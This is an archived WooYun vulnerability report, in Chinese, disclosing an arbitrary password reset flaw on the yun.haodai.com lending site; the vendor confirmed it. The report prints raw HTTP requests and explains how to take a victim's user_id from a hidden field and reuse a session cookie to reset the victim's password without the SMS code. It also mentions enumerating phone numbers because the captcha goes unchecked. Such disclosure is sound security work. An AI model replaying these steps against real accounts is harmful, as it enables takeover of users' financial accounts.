当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0136060

漏洞标题:P2P金融安全之好贷网某站任意用户口令重置

相关厂商:好贷网

漏洞作者: 二维码

提交时间:2015-08-22 13:45

修复时间:2015-10-08 16:06

公开时间:2015-10-08 16:06

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-22: 细节已通知厂商并且等待厂商处理中
2015-08-24: 厂商已经确认,细节仅向厂商公开
2015-09-03: 细节向核心白帽子及相关领域专家公开
2015-09-13: 细节向普通白帽子公开
2015-09-23: 细节向实习白帽子公开
2015-10-08: 细节向公众公开

简要描述:

没有绕不过的权限,只有不努力的白帽。

详细说明:

问题出在好贷云金融的忘记密码处。
先注册一个用户,然后点忘记密码。
第一步,输入注册用户的手机

POST /forget/index HTTP/1.1
Host: yun.haodai.com
Proxy-Connection: keep-alive
Content-Length: 36
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://yun.haodai.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.52 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://yun.haodai.com/forget/index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: _jzqy=1.1437404006.1437404006.1.jzqsr=baidu.-; __utma=6180778.38555312.1437494982.1437494982.1437494982.1; __utmz=6180778.1437494982.1.1.utmcsr=open.haodai.com|utmccn=(referral)|utmcmd=referral|utmcct=/; _jzqx=1.1437494988.1437494988.1.jzqsr=haodai%2Ecom|jzqct=/wenzhang/about/cate_id/1.-; PHPSESSID=uj2clr26429v2042cjfqchs3i0; SOURCE_HOST=yun.haodai.com; SOURCE_URL=http%3A%2F%2Fyun.haodai.com%2F; city=suzhou; _adwp=259660040.8949730735.1437404004.1437494982.1440217985.4; _adwb=259660040; _adwc=259660040; _adwr=259660040%230; Hm_lvt_64011e29de8b8794bd7490bbe3d1c0f5=1437808207,1440217986; Hm_lpvt_64011e29de8b8794bd7490bbe3d1c0f5=1440217986; _jzqa=1.834904286475560400.1437404006.1437494988.1440217987.4; _jzqc=1; _jzqckmp=1; _jzqb=1.1.10.1440217987.1; ipcity=suzhou; Hm_lvt_e8b7ad3a07009b2a72fb5c83ca882bb2=1440217293; Hm_lpvt_e8b7ad3a07009b2a72fb5c83ca882bb2=1440219352
step=1&email=15657XXXX34&verify=4876


自己手机接收到验证码后,输入短信验证码(第二步):

POST /forget/getpasswd HTTP/1.1
Host: yun.haodai.com
Proxy-Connection: keep-alive
Content-Length: 37
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://yun.haodai.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.52 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://yun.haodai.com/forget/index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: _jzqy=1.1437404006.1437404006.1.jzqsr=baidu.-; __utma=6180778.38555312.1437494982.1437494982.1437494982.1; __utmz=6180778.1437494982.1.1.utmcsr=open.haodai.com|utmccn=(referral)|utmcmd=referral|utmcct=/; _jzqx=1.1437494988.1437494988.1.jzqsr=haodai%2Ecom|jzqct=/wenzhang/about/cate_id/1.-; PHPSESSID=uj2clr26429v2042cjfqchs3i0; SOURCE_HOST=yun.haodai.com; SOURCE_URL=http%3A%2F%2Fyun.haodai.com%2F; city=suzhou; _adwp=259660040.8949730735.1437404004.1437494982.1440217985.4; _adwb=259660040; _adwc=259660040; _adwr=259660040%230; Hm_lvt_64011e29de8b8794bd7490bbe3d1c0f5=1437808207,1440217986; Hm_lpvt_64011e29de8b8794bd7490bbe3d1c0f5=1440217986; _jzqa=1.834904286475560400.1437404006.1437494988.1440217987.4; _jzqc=1; _jzqckmp=1; _jzqb=1.1.10.1440217987.1; ipcity=suzhou; Hm_lvt_e8b7ad3a07009b2a72fb5c83ca882bb2=1440217293; Hm_lpvt_e8b7ad3a07009b2a72fb5c83ca882bb2=1440219416
user_id=9902&mode=tel&checksms=650693


此处,发现了user_id就感觉会存在漏洞。
第三步,短信验证码校验通过后,输入两次新的密码

POST /forget/resetpasswd HTTP/1.1
Host: yun.haodai.com
Proxy-Connection: keep-alive
Content-Length: 50
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://yun.haodai.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.52 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://yun.haodai.com/forget/getpasswd
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: _jzqy=1.1437404006.1437404006.1.jzqsr=baidu.-; __utma=6180778.38555312.1437494982.1437494982.1437494982.1; __utmz=6180778.1437494982.1.1.utmcsr=open.haodai.com|utmccn=(referral)|utmcmd=referral|utmcct=/; _jzqx=1.1437494988.1437494988.1.jzqsr=haodai%2Ecom|jzqct=/wenzhang/about/cate_id/1.-; city=suzhou; _adwp=259660040.8949730735.1437404004.1437494982.1440217985.4; _adwb=259660040; _adwc=259660040; _adwr=259660040%230; Hm_lvt_64011e29de8b8794bd7490bbe3d1c0f5=1437808207,1440217986; Hm_lpvt_64011e29de8b8794bd7490bbe3d1c0f5=1440217986; _jzqa=1.834904286475560400.1437404006.1437494988.1440217987.4; _jzqc=1; _jzqckmp=1; _jzqb=1.1.10.1440217987.1; ipcity=suzhou; PHPSESSID=s0to0lfkrai5g4g0ie4djiu3j1; SOURCE_HOST=yun.haodai.com; SOURCE_URL=http%3A%2F%2Fyun.haodai.com%2Fforget%2Findex; Hm_lvt_e8b7ad3a07009b2a72fb5c83ca882bb2=1440217293; Hm_lpvt_e8b7ad3a07009b2a72fb5c83ca882bb2=1440219760
user_id=9902&passwd=test123&confirm_passwd=test123


虽然此处只有这么简单的三个参数,但是我直接把user_id改成了别人的却提示用户不存在,郁闷...
我改掉了cookie后,发现user_id为9902时竟然也提示用户不存在。
看来是做了cookie校验的。
但是真的就绕不过了么?
我打开另外一个浏览器,找回密码,输入别人的手机号码,以及图形验证码,点击下一步后,我虽然拿不到别人的短信验证码,但是我可以在返回的页面信息里找到他的user_id(假设为9XXX)

<input type="hidden" name="user_id" value="9XXX" />


接着我不输入短信验证码,直接将他的cookie拷贝出来,贴到上述找回密码的第三步过程中,并将user_id改为被我攻击的账户的user_id

POST /forget/resetpasswd HTTP/1.1
Host: yun.haodai.com
Proxy-Connection: keep-alive
Content-Length: 50
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://yun.haodai.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.52 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://yun.haodai.com/forget/getpasswd
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=eernhfa2vtnvos47vvbpgknid6; SOURCE_HOST=yun.haodai.com; SOURCE_URL=http%3A%2F%2Fyun.haodai.com%2F; Hm_lvt_e8b7ad3a07009b2a72fb5c83ca882bb2=1440217293,1440219865; Hm_lpvt_e8b7ad3a07009b2a72fb5c83ca882bb2=144021997
user_id=9XXX&passwd=test123&confirm_passwd=test123


提交,显示重置成功。
另外说一句,第一个接口处可以通过爆破的方式找到已经注册了的手机号(好像图形验证码并不会去验证)。

漏洞证明:

1.png


2.png

修复方案:

cookie校验可以更严格。

版权声明:转载请注明来源 二维码@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-08-24 16:05

厂商回复:

感谢

最新状态:

暂无


漏洞评价:

评论

  1. 2015-08-22 14:20 | S4M ( 路人 | Rank:24 漏洞数:8 | 吴彦祖)

    牛逼牛逼 膜拜大黑客!

  2. 2015-09-13 16:09 | BMa ( 普通白帽子 | Rank:1796 漏洞数:201 )

    @二维码 如果我没理解错的话,这里的缺陷是指验证路会话与用户id是否匹配,而没有校验 而没有校验该会话是否可以更新密码

  3. 2015-09-14 09:31 | 二维码 ( 实习白帽子 | Rank:61 漏洞数:4 | 老子跳起来就是个么么哒)

    @BMa 他的cookie里应该包含了某个字段来识别你这个用户需要更新密码的,所以我替换cookie后就成功了。